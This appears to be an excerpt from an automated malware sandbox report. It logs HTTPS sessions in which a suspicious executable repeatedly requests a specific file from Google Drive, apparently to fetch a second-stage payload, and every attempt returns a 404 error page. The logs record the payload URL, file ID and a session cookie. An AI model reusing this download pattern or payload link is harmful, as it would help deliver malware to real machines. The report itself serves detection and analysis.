                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rLL-kWXfYPk2jCVi7VkLZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.450018142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:46 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:46 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:46 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-dfKHYdqrJj2EaAXgRu8DEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.450019172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:47 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:47 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgSnY6MHVQZHWiVUxGsXY2lK-pXKUqzAIOHDDJSm2CFsqzvb19yD943GHOpNh63vf21_9XC72ow
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:47 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-zKVdffCKg-qiUCMhY6inUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:14:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 6c 59 72 69 56 75 38 56 4f 31 51 52 57 37 58 39 62 34 70 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KlYriVu8VO1QRW7X9b4pfg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.450020142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:58 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:59 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:58 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-SafmgB345mMy6mwKbILw6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.450021172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:59 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:00 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQjNjklE7Z7CkrJ0c2eibhlxijgDHGsFK4sfozC0ktT1FF00VTnE6TLNLOKAHvwqTUo
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:00 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-_bS7AF2ooonXMRoz1QntCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:15:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 6e 49 4d 49 38 76 72 78 63 2d 4b 71 4b 32 4c 4c 6e 5a 68 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nnIMI8vrxc-KqK2LLnZhcg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.450022142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:15:10 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:11 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:11 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-vL79CcVTA0OF6BC-_bq7_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.450023172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:15:11 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:12 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgRHiIk5OWEIMiNuXmNwG47Tjv0GwWBQh3X97hgHQnmrfthBIcQ2NQ2USWJYTOE9NQd_lw6GsfU
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:12 GMT
                                                        Content-Security-Policy: script-src 'nonce-OJtKk1cEY_gxfHRSLrA8Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:15:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 57 4d 76 66 71 57 4a 5f 68 79 59 59 52 62 47 4f 38 43 4a 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zWMvfqWJ_hyYYRbGO8CJeA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.450024142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:15:22 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:23 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:23 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce--O0ZoqzbgCPl6Qil_S71XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.450025172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:15:24 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:24 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgSq6ud_327R7xOMjGPXJwHGdAmG87EX8cjiSO49oI7NbwnaQ7lFhgWvUv_cy1t7NTyuhDkZK7E
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:24 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-0caRob6R8X__-ngXWLX0Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
